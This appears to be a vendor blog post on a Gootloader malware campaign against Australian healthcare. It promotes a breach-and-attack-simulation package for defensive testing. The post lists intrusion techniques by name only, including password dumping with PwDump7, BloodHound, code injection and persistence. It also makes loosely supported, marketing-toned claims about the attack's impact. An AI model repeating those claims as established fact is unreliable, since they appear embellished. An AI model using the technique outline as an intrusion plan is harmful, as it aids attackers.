Gootloader Attacks Healthcare Down Under

In the vast landscape of Australia, the healthcare sector faces mounting challenges in the realm of cybersecurity. Threat actors are increasingly setting their sights on healthcare institutions, exploiting vulnerabilities with cunning precision. Join us as we uncover the recent cyberattack by Gootloader on the Australian healthcare sector and delve into the critical importance of robust cybersecurity defenses in safeguarding patient data and vital healthcare services. Read More

As cyber threats continue to proliferate worldwide, no sector remains immune to the risk of malicious attacks. Down under, in Australia, the healthcare sector finds itself at the forefront of these challenges. Developments have unveiled a concerning trend: threat actors like Gootloader are setting their sights on Australian healthcare institutions, exploiting vulnerabilities with cunning precision. In this article, we delve into the depths of this cyber battleground, exploring the 2023 cyberattack aimed at the Australian healthcare sector by Gootloader and the newly released AttackIQ Flex package designed for simple simulation against your systems defenses.

Understanding Gootloader

Gootloader, also known as Gootkit, is a sophisticated threat actor known for its ability to deliver a wide range of malware payloads, including ransomware and banking trojans. Operating primarily through exploit kits and malicious spam campaigns, Gootloader employs deceptive tactics to lure unsuspecting users into clicking on malicious links or downloading infected files. Once executed, the malware can gain unauthorized access to systems, exfiltrate sensitive data, and wreak havoc on targeted networks.

In a 2023 cyberattack targeting the Australian healthcare sector, Gootloader deployed sophisticated techniques to infiltrate the networks of multiple healthcare organizations. Using a combination of social engineering tactics and exploit kits, the attackers were able to gain unauthorized access to sensitive systems, compromising patient data, and disrupting essential healthcare services.

TrendMicro’s report released in January 2023 detailed the infection routine employed by Gootloader, which had extended its attacks into the healthcare industry, specifically targeting Australia. The attackers utilized SEO Poisoning combined with the exploitation of keywords related to the healthcare sector and Australian cities as the initial access vector. Gootloader was distributed through a malicious ZIP archive containing a JavaScript (JS) file with prominent search query words, particularly those associated with “agreement.”

Impact on Healthcare Services

The cyberattack had far-reaching consequences, causing significant disruptions to healthcare services across affected organizations. Hospital systems were paralyzed, leading to delays in patient care, cancellation of appointments, and challenges in accessing medical records. Moreover, the compromise of patient data raised concerns regarding privacy violations and the potential for identity theft.

The cyberattack underscored the inherent vulnerabilities within the healthcare sector, highlighting the need for comprehensive cybersecurity strategies and resilient infrastructure. Healthcare organizations face unique challenges in defending against cyber threats, including the complexity of interconnected systems, legacy IT infrastructure, and the proliferation of connected medical devices. Moreover, the high value of healthcare data makes it an attractive target for malicious actors seeking financial gain or political motives.

Simulating the Attack with AttackIQ Flex’s New Package

Considering the evolving threat landscape and the sophistication of cyberattacks like the one orchestrated by Gootloader, it’s imperative for organizations, especially those in sensitive sectors like healthcare, to proactively assess and strengthen their cybersecurity defenses.

Recognizing this need, AttackIQ has introduced a new package in its AttackIQ Flex platform specifically designed to simulate the Gootloader cyberattack on the Austrialian Healthcare Sector. AttackIQ Flex empowers organizations to rapidly test their security controls on-demand. It revolutionizes the breach and attack simulation market by offering testing as a service, removing the obstacles of price, complexity, and time constraints that have kept organizations from comprehensive testing in the past.

The package includes a comprehensive set of attack scenarios based on the TrendMicro report detailing Gootloader’s infection routine. By replicating the tactics, techniques, and procedures (TTPs) employed by Gootloader, AttackIQ Flex enables organizations to identify gaps in their security posture and prioritize remediation efforts accordingly.

Scenarios included in this Package:

  • Save 2022-12 PowerShell Script so.ps1 Sample to File System
  • Native API
  • DLL Side-Loading
  • System Information Discovery via “GetComputerNameExW” Native API
  • System Drive Information Discovery via “DeviceIoControl” Native API
  • Download 2022-12 PowerShell Script so.ps1 Sample to Memory
  • Save 2022-11 PowerShell BloodHound Sample to File System
  • Save 2022-04 GootLoader Malicious JS Sample to File System
  • Code Injection via Load Library and Create Remote Thread
  • Discover Processes via “Get-Process” PowerShell Command
  • Download 2022-04 GootLoader Malicious ZIP Sample to Memory
  • Save 2022-11 libvls.dll Sample to File System
  • Dump Passwords using PwDump7
  • BloodHound Ingestor Execution
  • Persistence Through Registry Run and RunOnce Keys
  • Download 2022-11 PowerShell BloodHound Sample to Memory
  • Open Ports Checker
  • JavaScript File Execution via “cscript.exe” Script
  • Save 2022-04 GootLoader Malicious ZIP Sample to File System
  • Persistence Through Scheduled Task
  • System Owner/User Discovery via “GetUserNameW” Native API
  • Discover Files and Directories via Powershell Script
  • Download 2022-11 libvls.dll Sample to Memory
  • Create Registry Entry


The cyberattack orchestrated by Gootloader against the Australian healthcare sector underscores the urgent need for enhanced cybersecurity measures and collaborative efforts to protect critical infrastructure and safeguard patient information. By leveraging AttackIQ Flex’s new package, organizations can assess the effectiveness of their security controls in detecting and mitigating sophisticated cyber threats like the Gootloader attack. Through continuous validation and optimization of security defenses, organizations can enhance their resilience against evolving threats and better protect their critical assets and sensitive data.

Key Points:

  1. Gootloader Threat: Gootloader, a sophisticated threat actor, has targeted the Australian healthcare sector with advanced malware delivery techniques, posing significant risks to sensitive data and critical infrastructure.
  2. Attack Techniques: Gootloader employs deceptive tactics like SEO Poisoning and malicious ZIP archives containing JavaScript files to infiltrate systems. Its attack methodology includes exploiting keywords related to healthcare and Australian cities, demonstrating the evolving nature of cyber threats.
  3. Impact on Healthcare Services: The cyberattack led to substantial disruptions in healthcare services, including hospital system paralysis, patient care delays, and privacy concerns due to compromised data. This highlights the vulnerability of the healthcare sector and the need for robust cybersecurity measures.
  4. Cybersecurity Solutions: Recognizing the importance of proactive defense, AttackIQ introduced a new package in its AttackIQ Flex platform. This package simulates the Gootloader cyberattack, allowing organizations to test their security controls effectively and identify vulnerabilities to prioritize remediation efforts.
  5. Conclusion and Recommendations: The Gootloader attack emphasizes the criticality of enhanced cybersecurity measures and collaborative efforts to protect critical infrastructure and patient information. By leveraging tools like AttackIQ Flex and continuously validating security defenses, organizations can strengthen their resilience against evolving cyber threats and safeguard their assets effectively.